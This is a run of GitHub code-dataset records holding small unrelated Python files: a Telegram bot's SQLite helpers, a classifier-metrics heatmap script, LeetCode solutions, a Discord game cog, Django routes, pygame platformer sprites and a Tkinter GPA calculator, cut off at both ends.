\"http://pngimg.com/upload/butterfly_PNG1037.png\"\n matches = w.get_matches(url)\n\n","repo_name":"yukseltron/animadex","sub_path":"wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"28875991401","text":"import datetime\nimport sqlite3\n\nimport config\n\nconnection = sqlite3.connect(\"database/database.db\", check_same_thread=False)\n\n\ndef get_step(manager_id: int) -> int:\n \"\"\"\n Возвращает шаг работы с ботом для менеджера\n\n :param manager_id: Telegram ID менеджера\n \"\"\"\n\n cursor = connection.cursor()\n\n request = \"SELECT step FROM managers WHERE telegram_id=?\"\n result = cursor.execute(request, (manager_id,)).fetchone()\n\n return result[0]\n\n\ndef set_step(manager_id: int, step: int):\n \"\"\"\n Изменяет шаг работы с ботом для менеджера\n\n :param manager_id: Telegram ID менеджера\n :param step: Шаг работы с ботом\n \"\"\"\n\n cursor = connection.cursor()\n\n request = \"UPDATE managers SET step=? WHERE telegram_id=?\"\n cursor.execute(request, (step, manager_id))\n connection.commit()\n\n\ndef add_user(manager_id: int):\n \"\"\"\n Добавляет менеджера в базу данных\n\n :param manager_id: Telegram ID менеджера\n \"\"\"\n\n cursor = connection.cursor()\n\n request = \"INSERT INTO managers(telegram_id) VALUES (?)\"\n cursor.execute(request, (manager_id,))\n connection.commit()\n\n\ndef delete_not_public_trip():\n \"\"\"\n Удаляет непубличную поездку\n \"\"\"\n\n cursor = connection.cursor()\n request = \"DELETE FROM trips WHERE state=?\"\n cursor.execute(request, (config.TripsStates.IN_PROCESS,))\n connection.commit()\n\n\ndef create_trip(departure_point: str):\n \"\"\"\n Создает новую поездку\n\n :param departure_point: Точка отправления\n \"\"\"\n\n creation_date = datetime.datetime.now()\n\n cursor = connection.cursor()\n request = \"INSERT INTO trips(departure_point, creation_date, state) VALUES(?, ?, ?)\"\n cursor.execute(request, (departure_point, creation_date, config.TripsStates.IN_PROCESS))\n connection.commit()\n\n\ndef get_not_public_trip():\n \"\"\"\n Возвращает ID неопубликованной поездки\n \"\"\"\n\n cursor = connection.cursor()\n request = \"SELECT id FROM trips WHERE state=?\"\n result = cursor.execute(request, (config.TripsStates.IN_PROCESS,)).fetchone()\n return result[0] if result else result\n\n\ndef set_arrival_point(trip_id: int, arrival_point: str):\n \"\"\"\n Устанавливает точку прибытия\n\n :param trip_id: ID поездки\n :param arrival_point: Точка прибытия\n \"\"\"\n\n cursor = connection.cursor()\n request = \"UPDATE trips SET arrival_point=? WHERE id=?\"\n cursor.execute(request, (arrival_point, trip_id))\n connection.commit()\n\n\ndef set_time_for_trip(trip_id: int, trip_time: str):\n \"\"\"\n Устанавливает время поездки\n\n :param trip_id: ID поездки\n :param trip_time: Время поездки\n \"\"\"\n\n cursor = connection.cursor()\n request = \"UPDATE trips SET time=? WHERE id=?\"\n cursor.execute(request, (trip_time, trip_id))\n connection.commit()\n\n\ndef set_price_for_trip(trip_id: int, trip_price: int):\n \"\"\"\n Устанавливает стоимость поездки\n\n :param trip_id: ID поездки\n :param trip_price: Стоимость поездки\n \"\"\"\n\n cursor = connection.cursor()\n request = \"UPDATE trips SET price=? WHERE id=?\"\n cursor.execute(request, (trip_price, trip_id))\n connection.commit()\n\n\ndef publish_trip(trip_id: int):\n \"\"\"\n Публикует поездку\n\n :param trip_id: ID поездки\n \"\"\"\n\n cursor = connection.cursor()\n request = \"UPDATE trips SET state=? WHERE id=?\"\n cursor.execute(request, (config.TripsStates.PUBLIC, trip_id))\n connection.commit()\n\n\ndef get_info_about_trip(trip_id: int):\n \"\"\"\n Возвращает всю информацию о поездке\n\n :param trip_id: ID поездки\n \"\"\"\n\n cursor = connection.cursor()\n request = \"SELECT id, departure_point, arrival_point, time, price, creation_date, state, additional_info FROM trips WHERE id=?\"\n result = cursor.execute(request, (trip_id,)).fetchone()\n return {\n \"id\": trip_id,\n \"departure_point\": result[1],\n \"arrival_point\": result[2],\n \"time\": result[3],\n \"price\": result[4],\n \"creation_date\": result[5],\n \"state\": result[6],\n \"additional_info\": result[7]\n }\n\n\ndef check_if_valid_trip_id(trip_id: int) -> bool:\n \"\"\"\n Проверяет, есть ли ID такой поездки в базе данных\n\n :param trip_id: ID поездки\n \"\"\"\n\n cursor = connection.cursor()\n request = \"SELECT id FROM trips WHERE id=?\"\n result = cursor.execute(request, (trip_id,)).fetchone()\n return True if result else False\n\n\ndef get_response_answer_for_trip(trip_id: int, driver_id: int):\n \"\"\"\n Возвращает ответ водителя на заказ\n\n :param trip_id: ID заявки на поездку\n :param driver_id: Telegram ID водителя\n \"\"\"\n\n cursor = connection.cursor()\n request = \"SELECT response_type FROM responses WHERE trip_id=? AND driver_id=?\"\n result = cursor.execute(request, (trip_id, driver_id)).fetchone()\n return result[0] if result else result\n\n\ndef create_trip_response(trip_id: int, driver_id: int, response_type: int):\n \"\"\"\n Добавляет в базу данных ответ на поездку от водителя\n\n :param trip_id: ID поездки\n :param driver_id: Telegram ID водителя\n :param response_type: Тип ответа: принял или отклонил\n \"\"\"\n\n cursor = connection.cursor()\n request = \"INSERT INTO responses(trip_id, driver_id, response_type) VALUES(?, ? ,?)\"\n cursor.execute(request, (trip_id, driver_id, response_type))\n connection.commit()\n\n\ndef set_trip_state(trip_id: int, state: int):\n \"\"\"\n Устанавливает статус поездки\n\n :param trip_id: ID поездки\n :param state: Статус поездки\n \"\"\"\n\n cursor = connection.cursor()\n request = \"UPDATE trips SET state=? WHERE id=?\"\n cursor.execute(request, (state, trip_id))\n connection.commit()\n\n\ndef set_additional_info(trip_id: int, additional_info: str):\n \"\"\"\n Устанавливает дополнительную информацию о поездке\n\n :param trip_id: ID поездки\n :param additional_info: Дополнительная информация\n \"\"\"\n\n cursor = connection.cursor()\n request = \"UPDATE trips SET additional_info=? WHERE id=?\"\n cursor.execute(request, (additional_info, trip_id))\n connection.commit()\n\n\ndef get_all_trips():\n \"\"\"\n Возвращает все поездки\n \"\"\"\n\n cursor = connection.cursor()\n request = \"SELECT departure_point, arrival_point, time, price, additional_info, state FROM trips\"\n result = cursor.execute(request).fetchall()\n return result\n\n\ndef check_if_driver(driver_id: int) -> bool:\n \"\"\"\n Проверяет, есть ли водитель в базе данных\n\n :param driver_id: Telegram ID водителя\n \"\"\"\n\n cursor = connection.cursor()\n request = \"SELECT driver_id FROM drivers WHERE driver_id=?\"\n result = cursor.execute(request, (driver_id,)).fetchone()\n return True if result else False\n\n\ndef add_driver(driver_id: int, driver_full_name: str):\n \"\"\"\n Добавляет водителя в базу данных\n\n :param driver_id: Telegram ID водителя\n :param driver_full_name: Полное имя водителя\n \"\"\"\n\n cursor = connection.cursor()\n request = \"INSERT INTO drivers(driver_id, driver_full_name) VALUES(?, ?)\"\n cursor.execute(request, (driver_id, driver_full_name))\n connection.commit()\n\n\ndef update_drivers_full_name(driver_id: int, driver_full_name: str):\n \"\"\"\n Обновляет имя водителя\n\n :param driver_id: Telegram ID водителя\n :param driver_full_name: Полное имя водителя\n \"\"\"\n\n cursor = connection.cursor()\n request = \"UPDATE drivers SET driver_full_name=? WHERE driver_id=?\"\n cursor.execute(request, (driver_full_name, driver_id))\n connection.commit()","repo_name":"aeroboss13/driver_bot.py","sub_path":"database/db_work.py","file_name":"db_work.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"38228777039","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom decimal import Decimal\r\nfor i in range (1,21):\r\n\tj = int(i*5)\r\n\tfor target in ['dd','lnm']:\r\n\t\tx, y = np.meshgrid(np.linspace(0, 5, 6),np.linspace(0, 10, 11))\r\n\t\tz = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['AUC'].values\r\n\t\tfor item in range (0,len(np.array(z))):\r\n\t\t\tif np.array(z)[item] == np.max(np.array(z)):\r\n\t\t\t\tbestAUC = round(np.array(z)[item],4)\r\n\t\t\t\tbestCLASS = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['Classifier_Method'][item]\r\n\t\t\t\tbestFS = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['Subset'][item]\r\n\t\t\t\tbestsp = round(np.array(pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['Specificity'].values)[item],4)\r\n\t\t\t\tbestse = round(np.array(pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['Sensitivity'].values)[item],4)\r\n\t\t\t\tbesttp = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['TP'][item]\r\n\t\t\t\tbesttn = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['TN'][item]\r\n\t\t\t\tbestfp = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['FP'][item]\r\n\t\t\t\tbestfn = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['FN'][item]\r\n\t\t\t\tbestacc= round(np.array(pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['ACC'].values)[item],4)\r\n\t\tz = z.reshape((10,5))\r\n\t\tz_min, z_max = z.max(), z.max()\r\n\t\tfig, ax = plt.subplots()\r\n\t\tc = ax.pcolormesh(x, y, z, cmap='BuPu', vmin=0, vmax=1)\r\n\t\tplt.xticks(np.arange(1,6)-0.5, ('JMI','MRMR','SKB','SP','WLCX'))\r\n\t\tplt.yticks(np.arange(1,11)-0.5, ('ADAC', 'BAGC', 'BNB', 'DTC', 'GNBC', 'KNNC', 'RFC', 'SGDC','SVMC', 'XGBC'))\r\n\t\tplt.xlabel('Feature Selection Method')\r\n\t\tplt.ylabel('Classifier')\r\n\t\tfor i in range (0,10):\r\n\t\t\tfor j in range (0,5):\r\n\t\t\t\tplt.text(j+0.25,i+0.25,Decimal(z[i][j]).quantize(Decimal(\"0.00\")))\r\n\t\tfig.colorbar(c, ax=ax)\r\n\t\tplt.plot([0.05, 0.95], [1.95, 1.95], color='red', linestyle='-')\r\n\t\tplt.plot([0.05, 0.95], [1, 1], color='red', linestyle='-')\r\n\t\tplt.plot([0.05, 0.05], [1, 1.95], color='red', linestyle='-')\r\n\t\tplt.plot([0.95, 0.95], [1, 1.95], color='red', linestyle='-')\r\n\t\tplt.tight_layout()\r\n\r\n\t\tplt.savefig('fig_heatmap_{}_{}.png'.format(target,j))\r\n\t\tplt.savefig('fig_heatmap_{}_{}.pdf'.format(target,j))\r\n\t\tplt.savefig('fig_heatmap_{}_{}.tiff'.format(target,j))\r\n\t\tplt.show()","repo_name":"guangzhaohui/EC-paper","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"9892790482","text":"def sumNumber(array, target):\n if not array:\n return None\n if not target:\n return None\n \n map = {}\n for i in array:\n val = target - i\n if val in map:\n return [val, i]\n map[i] = i\n return None\n\n\n \n\n\narr = [2, 7, 11, 15]\ntarget = 8\nprint(sumNumber(arr, target))\n","repo_name":"razakadam74/Interview-Preparation","sub_path":"19th/sumNumbers.py","file_name":"sumNumbers.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"73108993378","text":"'''\nprint(\"k\", 3+5)\nanswer = input('Mano que preguiça, pqp. Como cễ tá?')\nprint(answer)\nidade = int(input(\"Quantos anos tu tem mesmo?\"))\nprint(idade, type(idade))\nprint(f'vc tem {idade} anos e já tá {answer}')\n\n#multiplicação de string\nprint(\"sono\" * 20)\n'''\n\n# Exercicio 1\n\nnome = input(\"Entre com seu nome completo: \\n\")\nprint('Nome completo: ', nome)\nprint('Maiúsculas: ', nome.upper())\nprint('Minúsculas: ', nome.lower())\nprint('Tamanho: ', len(nome))\nprint('Trocado', nome.replace('Brandani', 'do Inatel'))\n\n#Exercicio 2\n\nnumero = int(input(\"Escolha um número: \"))\ninicio = int(input(\"Escolha o número de inicio da tabuada: \"))\nfim = int(input(\"Escolha o número de fim da tabuada: \"))\n\nwhile inicio <= fim:\n print(f\"{numero}x{inicio} = {numero*inicio}\")\n inicio += 1\n\n#Exercicio 3\nsexo = 'nada'\nwhile(sexo != 'M' and sexo != 'F'):\n sexo = input('Entre com M para homem ou F para mulher: ')\n\n\n\n\n\n\n\n\n\n","repo_name":"Uttoni/analise-de-dados-c111","sub_path":"Aula1IntroducaoPython.py","file_name":"Aula1IntroducaoPython.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39139161850","text":"# 字母异位词分组\nimport collections\nfrom typing import List\n\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n mp = collections.defaultdict(list)\n\n for st in strs:\n key = \"\".join(sorted(st))\n mp[key].append(st)\n\n return list(mp.values())\n\n def group(self, strs):\n if len(strs) < 2:\n return strs\n ans = {}\n for s in strs:\n count = [0] * 26\n for c in s:\n count[ord(c) - ord('a')] += 1\n key = tuple(count)\n ans[key] = ans.get(key, []) + [s]\n return ans.values()\n # return [[*x] for _, x in itertools.groupby(sorted(strs, key=sorted), sorted)]\n","repo_name":"mach8686devops/leetcode-100","sub_path":"0049.py","file_name":"0049.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43143595380","text":"import random\n\nfrom discord.ext import commands\nfrom discord.ext.commands import Cog\n\nfrom moosebot import MooseBot, cog_group\n\n\n@cog_group(\"Interactive\")\nclass GuessGame(Cog, name=\"Guessing Game\"):\n\n def __init__(self, bot: MooseBot):\n self.bot = bot\n self.db = bot.database.db\n\n async def get_input(self, ctx, datatype, error=''):\n while True:\n try:\n message = await self.bot.client.wait_for('message', check=lambda message: message.author is ctx.author,\n timeout=60)\n message = datatype(message.content)\n return message\n except Exception:\n await ctx.send(error)\n\n async def gameover(self, ctx, funct):\n await ctx.send(\"Do you want to play again? (**Yes**/**No**)\")\n self.message = await self.get_input(ctx, str)\n self.message = self.message.lower()\n\n if self.message == 'yes' or self.message == 'y':\n await funct()\n elif self.message == 'no' or self.message == 'n':\n await ctx.send(\"Thanks for playing!\")\n else:\n await self.gameover(ctx, funct)\n\n @commands.command(help=\"Guess the number game.\")\n async def guess(self, ctx):\n\n async def play():\n channel = ctx.channel\n await ctx.send(\"Guess a number between 1 and 100.\")\n error = \"Please enter a number.\"\n guess = await self.get_input(ctx, int, error)\n answer = random.randint(1, 100)\n counter = 0\n\n while guess != answer:\n counter += 1\n if guess > answer:\n await ctx.send(\"{} your guess of `{}` is too high! Try again\".format(ctx.author.mention, guess))\n guess = await self.get_input(ctx, int, error)\n else:\n await ctx.send(\"{} your guess of `{}` is too low! Try again\".format(ctx.author.mention, guess))\n guess = await self.get_input(ctx, int, error)\n else:\n if counter <= 1:\n await ctx.send(\"Congratulations! You got it on the first attempt!\")\n else:\n await ctx.send(f\"Congratulations! It took you {counter} tries to guess the correct number.\")\n await self.gameover(ctx, play)\n\n await play()\n\n @commands.command(help=\"Rock paper scissors game.\")\n async def rps(self, ctx, amount=None):\n user = str(ctx.author.id)\n amount = amount or None\n if amount is None:\n amount = 1\n elif amount == 'all':\n amount = int((await self.db.money.find_one({'userid': user}))['balance'])\n if amount == 'all':\n amount = (await self.db.money.find_one({'userid': user}))['balance']\n if amount <= 0:\n await ctx.send(f\"You need to bet at least 1{MooseBot.currency} to play.\")\n\n async def play():\n await ctx.send(\"Let's play rock, paper, scissors. Select your weapon:\")\n choices = ('rock', 'paper', 'scissors')\n computer = choices[random.randint(0, 2)]\n player = await self.get_input(ctx, str)\n player = player.lower()\n if player == 'r':\n player = 'rock'\n elif player == 's':\n player = 'scissors'\n elif player == 'p':\n player = 'paper'\n else:\n player = player\n\n beats = {'rock': ['paper'],\n 'paper': ['scissors'],\n 'scissors': ['rock']}\n\n if computer and player in choices:\n if computer == player:\n await ctx.send(f\"**Tie!** You both chose {computer.title()}. You lose no {MooseBot.currency}.\")\n await self.gameover(ctx, play)\n elif player in beats[computer]:\n await ctx.send(\n f\"**You win!** Moosebot chose: {computer.title()}, and you chose: {player.title()}.You won {amount}{MooseBot.currency}.\")\n await self.db.money.update_one({'userid': str(ctx.author.id)}, {'$inc': {'balance': amount}})\n await self.gameover(ctx, play)\n else:\n await ctx.send(\n f\"**You lose!** Moosebot chose: {computer.title()}, and you chose: {player.title()}.You lost {amount}{MooseBot.currency}.\")\n await self.db.money.update_one({'userid': str(ctx.author.id)}, {'$inc': {'balance': -amount}})\n await self.gameover(ctx, play)\n else:\n await play()\n\n await play()\n\n\ndef setup(bot):\n bot.add_cog(GuessGame(bot.moose))\n","repo_name":"SilverEyess/MooseBot","sub_path":"moosebot/cogs/guess_game.py","file_name":"guess_game.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"2075268505","text":"from django.urls import path,include ,re_path\r\nfrom core import views\r\n\r\nurlpatterns = [\r\n path('',views.index,name='Dashboard'),\r\n path('Manage/',views.manage,name='Manage'),\r\n re_path('Orders/',views.orders,name='orders'),\r\n path('Profile/',views.profile,name='Profile'),\r\n path('Contact/',views.contact,name='Contact'),\r\n path('Logout/',views.logout,name='Logout'),\r\n path('Vendors/',views.vendors,name='vendors'),\r\n path('license/',views.license_order,name='home'),\r\n path('edit',views.Edit,name='edit'),\r\n path('update/',views.Update,name=\"update\"),\r\n path('delete/',views.Delete,name=\"delete\"),\r\n path('add',views.add,name='add'),\r\n \r\n \r\n]","repo_name":"amal512329/django_order","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33628866279","text":"# sprite classes for platform game\nimport pygame as pg\nfrom settings import *\nfrom random import choice, randrange\nvec = pg.math.Vector2\n\nclass Player(pg.sprite.Sprite):\n def __init__(self, game):\n self._layer = PLAYER_LAYER\n self.groups = game.all_sprites\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.walking = False\n self.jumping = False\n self.current_frame = 0\n self.last_update = 0\n self.load_images()\n self.image = self.standing_frames[0]\n self.rect = self.image.get_rect()\n self.rect.center = (WIDTH / 2, HEIGHT / 2)\n self.pos = vec(WIDTH / 2, HEIGHT - 40)\n self.vel = vec(0, 0)\n self.acc = vec(0, 0)\n\n def load_images(self):\n self.standing_frames_temp = [pg.image.load('./images/standing.png'),\n pg.image.load('./images/standing_1.png')] # Add a flipped idle animation\n self.standing_frames = []\n for frame in self.standing_frames_temp:\n self.standing_frames.append(pg.transform.scale(frame, (PLAYER_IMG_WIDTH * PLAYER_SCALE, PLAYER_IMG_HEIGHT * PLAYER_SCALE)))\n \n self.walk_frames_r_temp = [pg.image.load('./images/run_0.png'),\n pg.image.load('./images/run_1.png'),\n pg.image.load('./images/run_2.png'),\n pg.image.load('./images/run_3.png'),\n pg.image.load('./images/run_4.png'),\n pg.image.load('./images/run_5.png'),\n pg.image.load('./images/run_6.png')]\n self.walk_frames_r = []\n for frame in self.walk_frames_r_temp:\n self.walk_frames_r.append(pg.transform.scale(frame, (PLAYER_IMG_WIDTH * PLAYER_SCALE, PLAYER_IMG_HEIGHT * PLAYER_SCALE)))\n \n self.walk_frames_l = []\n for frame in self.walk_frames_r:\n self.walk_frames_l.append(pg.transform.flip(frame, True, False))\n \n self.jump_frame_r = pg.image.load('./images/jump.png') # Add a flipped jump spirte\n self.jump_frame_r = pg.transform.scale(self.jump_frame_r, (PLAYER_IMG_WIDTH * PLAYER_SCALE, PLAYER_IMG_HEIGHT * PLAYER_SCALE))\n\n self.jump_frame_l = pg.transform.flip(self.jump_frame_r, True, False)\n\n self.wall_stick_r = pg.image.load('./images/wall_stick.png')\n self.wall_stick_r = pg.transform.scale(self.wall_stick_r, (PLAYER_IMG_WIDTH * PLAYER_SCALE, PLAYER_IMG_HEIGHT * PLAYER_SCALE))\n\n self.wall_stick_l = pg.transform.flip(self.wall_stick_r, True, False)\n\n def jump_cut(self):\n if self.jumping:\n if self.vel.y < -3: # If moving upwards y is negative, 3 if just a number\n self.vel.y = -3\n\n def jump(self):\n # jump only if standing on a platform\n # checks to see if the player is standing on a platform, if so the player can jump\n self.rect.y += 2\n hits = pg.sprite.spritecollide(self, self.game.platforms, False)\n self.rect.y -= 2\n hits_left = pg.sprite.spritecollide(self, self.game.left_wall_platforms, False)\n hits_right = pg.sprite.spritecollide(self, self.game.right_wall_platforms, False)\n if hits and not self.jumping:\n self.game.jump_sound.play()\n self.jumping = True\n self.vel.y = -PLAYER_JUMP\n if hits_left:\n self.game.jump_sound.play()\n self.vel.x += 30\n self.vel.y -= 20\n if hits_right:\n self.game.jump_sound.play()\n self.vel.x -= 30\n self.vel.y -= 20\n\n def update(self):\n self.animate()\n self.acc = vec(0, PLAYER_GRAV)\n keys = pg.key.get_pressed()\n if keys[pg.K_LEFT]:\n self.acc.x = -PLAYER_ACC\n if keys[pg.K_RIGHT]:\n self.acc.x = PLAYER_ACC\n \n if self.jumping and self.vel.x > 0: # jumping right sprite\n self.image = self.jump_frame_r\n if self.jumping and self.vel.x < 0: # jumping left sprite\n self.image = self.jump_frame_l\n\n hits_left = pg.sprite.spritecollide(self, self.game.left_wall_platforms, False)\n hits_right = pg.sprite.spritecollide(self, self.game.right_wall_platforms, False)\n if hits_left or hits_right:\n self.pos += self.vel + self.acc * PLAYER_WALL_FRICTION\n if hits_left:\n self.rect.midleft = self.pos\n self.image = self.wall_stick_l\n if hits_right:\n self.rect.midright = self.pos\n self.image = self.wall_stick_r\n else:\n # apply friction\n self.acc.x += self.vel.x * PLAYER_FRICTION\n # equations of motion\n self.vel += self.acc\n if abs(self.vel.x) < 0.1: # stops walking animation eventhough player standing still\n self.vel.x = 0\n self.pos += self.vel + 0.5 * self.acc\n self.rect.midbottom = self.pos\n\n def animate(self):\n now = pg.time.get_ticks()\n if self.vel.x != 0:\n self.walking = True\n else:\n self.walking = False\n # show walk animation\n if self.walking:\n if now - self.last_update > 100:\n self.last_update = now\n self.current_frame = (self.current_frame + 1) % len(self.walk_frames_l)\n if self.vel.x > 0:\n self.image = self.walk_frames_r[self.current_frame]\n else:\n self.image = self.walk_frames_l[self.current_frame]\n\n # show idle animation\n if not self.jumping and not self.walking:\n if now - self.last_update > 350:\n self.last_update = now\n self.current_frame = (self.current_frame + 1) % len(self.standing_frames)\n self.image = self.standing_frames[self.current_frame]\n\nclass Platform(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self._layer = PLATFORM_LAYER\n self.groups = game.all_sprites, game.platforms\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n images = [pg.image.load('./images/log_0.png'),\n pg.image.load('./images/log_1.png')]\n self.image = choice(images)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n if randrange(100) < POWERUP_SPAWN_PCT:\n Powerup(self.game, self)\n\nclass Platform_Wall(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self._layer = PLATFORM_LAYER\n pg.sprite.Sprite.__init__(self)\n self.game = game\n self.image = pg.image.load('./images/log_wall.png')\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\nclass Powerup(pg.sprite.Sprite):\n def __init__(self, game, plat):\n self._layer = POWERUP_LAYER\n self.groups = game.all_sprites, game.powerups\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.plat = plat\n self.type = choice(['boost'])\n self.image = pg.image.load('./images/powerup_boost.png')\n self.image = pg.transform.scale(self.image, (int(BOOST_IMG_WIDTH / 2), int(BOOST_IMG_HEIGHT / 2)))\n self.rect = self.image.get_rect()\n self.rect.centerx = self.plat.rect.centerx\n self.rect.bottom = self.plat.rect.top - 5\n\n def update(self):\n self.rect.bottom = self.plat.rect.top - 5\n if not self.game.platforms.has(self.plat):\n self.kill()\n\nclass Mob(pg.sprite.Sprite):\n def __init__(self, game):\n self._layer = MOB_LAYER\n self.groups = game.all_sprites, game.mobs\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image_up = pg.image.load('./images/bird.png')\n self.image_up = pg.transform.scale(self.image_up, (int(MOB_IMG_WIDTH / 5), int(MOB_IMG_HEIGHT / 5)))\n self.image_down = pg.image.load('./images/bird.png') # replace with different bird stance for animation\n self.image_down = pg.transform.scale(self.image_down, (int(MOB_IMG_WIDTH / 5), int(MOB_IMG_HEIGHT / 5)))\n self.image = self.image_up\n self.rect = self.image.get_rect()\n self.rect.centerx = choice([-100, WIDTH + 100])\n self.vx = randrange(1, 4)\n if self.rect.centerx > WIDTH:\n self.vx *= -1\n self.rect.y = randrange(HEIGHT / 2)\n self.vy = 0\n self.dy = 0.5\n\n def update(self):\n self.rect.x += self.vx\n self.vy += self.dy\n if self.vy > 3 or self.vy < -3:\n self.dy *= -1\n center = self.rect.center\n if self.dy < 0:\n self.image = self.image_up\n else:\n self.image = self.image_down\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.rect.y += self.vy\n if self.rect.left > WIDTH + 100 or self.rect.right < -100:\n self.kill()","repo_name":"J4RB/My-GitHub","sub_path":"Eksamensprojekt-i-gym/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":9079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7974107544","text":"from tkinter import *\r\nimport tkinter.messagebox\r\n\r\ncheck = \"L\"\r\ndef Choice():\r\n global check\r\n if Course_Score.get() == 1 :\r\n Literal_Options.grid_forget()\r\n Percentage_Entry.configure(state = NORMAL)\r\n check = \"P\"\r\n\r\n elif Course_Score.get() == 0 :\r\n Percentage_Entry.delete(0,END)\r\n Percentage_Entry.configure(state = DISABLED)\r\n Literal_Options.grid(row = 0 ,column = 1)\r\n check = \"L\"\r\n\r\nCourses_Number = 0\r\ndef Add_Course():\r\n global Courses_Number ,check ,point\r\n score = DoubleVar()\r\n point = DoubleVar()\r\n if check == \"P\" :\r\n try :\r\n Percentage = float(Percentage_Entry.get())\r\n if Percentage >= 0.0 and Percentage <= 100.0 :\r\n if Percentage >= 90.0 and Percentage <= 100.0 :\r\n point = 4.0\r\n elif Percentage >= 85.0 and Percentage < 90.0 :\r\n point = 3.75\r\n elif Percentage >= 80.0 and Percentage < 85.0 :\r\n point = 3.4\r\n elif Percentage >= 75.0 and Percentage < 80.0 :\r\n point = 3.1\r\n elif Percentage >= 70.0 and Percentage < 75.0 :\r\n point = 2.75\r\n elif Percentage >= 65.0 and Percentage < 70.0 :\r\n point = 2.5\r\n elif Percentage >= 60.0 and Percentage < 65.0 :\r\n point = 2.2\r\n elif Percentage >= 50.0 and Percentage < 60.0 :\r\n point = 2.0\r\n elif Percentage >= 0.0 and Percentage < 50.0 :\r\n point = 1.0\r\n\r\n Courses_Number += 1\r\n Courses_Number_Display.configure(text = Courses_Number)\r\n HoursList.append(hours.get())\r\n Hours_Number_Display.configure(text = sum(HoursList))\r\n ScoreList.append(point)\r\n score = point\r\n TotalList.append( float(score * hours.get()) )\r\n\r\n else :\r\n Percentage_Entry.delete(0 ,END)\r\n tkinter.messagebox.showerror(\"ERROR !\" ,\"You must enter a value between 0 and 100\")\r\n\r\n except ValueError :\r\n Percentage_Entry.delete(0 ,END)\r\n tkinter.messagebox.showerror(\"ERROR !\" ,\"You must enter a value between 0 and 100\")\r\n\r\n elif check == \"L\" :\r\n Courses_Number += 1\r\n Courses_Number_Display.configure(text = Courses_Number)\r\n HoursList.append(hours.get())\r\n Hours_Number_Display.configure(text = sum(HoursList))\r\n ScoreList.append(Literal_Points.get(letter.get()))\r\n score = Literal_Points.get(letter.get())\r\n TotalList.append( float(score * hours.get()) )\r\n\r\ndef Undo() :\r\n global Courses_Number\r\n if len(TotalList) != 0 :\r\n HoursList.pop()\r\n ScoreList.pop()\r\n TotalList.pop()\r\n Courses_Number -= 1\r\n if Courses_Number == 0 and sum(HoursList) == 0 :\r\n Courses_Number_Display.configure(text = \"\")\r\n Hours_Number_Display.configure(text = \"\")\r\n Letter.configure(text = \"\")\r\n else :\r\n Courses_Number_Display.configure(text = Courses_Number)\r\n Hours_Number_Display.configure(text = sum(HoursList))\r\n\r\n Percentage_Entry.delete(0 ,END)\r\n GPA_Display.configure(text = \"\")\r\n Grade_Display.configure(text = \"\")\r\n\r\n else: tkinter.messagebox.showwarning(\"Warning !\" ,\"You didn't add any course to undo addition\")\r\n\r\ndef Caculate_GPA() :\r\n if sum(HoursList) != 0 :\r\n gpa = float(sum(TotalList)/sum(HoursList))\r\n print (\"Course Points * Hours = \")#227.29999999999995\r\n print (sum(TotalList))\r\n print (\"Hours = \")#93\r\n print (sum(HoursList))\r\n grade = StringVar()\r\n f_color = StringVar()\r\n let = StringVar()\r\n \r\n if gpa >= 3.4 and gpa <= 4.0 :\r\n grade = \"Excellent\"\r\n f_color = \"green\"\r\n let = \"A\"\r\n elif gpa >= 2.8 and gpa < 3.4 :\r\n grade = \"Very Good\"\r\n f_color = \"#000fff000\"\r\n let = \"B\"\r\n elif gpa >= 2.4 and gpa < 2.8 :\r\n grade = \"Good\"\r\n f_color = \"orange\"\r\n let = \"C\"\r\n elif gpa >= 2.0 and gpa < 2.4 :\r\n grade = \"Pass\"\r\n f_color = \"red\"\r\n let = \"D\"\r\n elif gpa >= 1.4 and gpa < 2.0 :\r\n grade = \"Weak\"\r\n f_color = \"magenta\"\r\n let = \"F\"\r\n elif gpa < 1.4 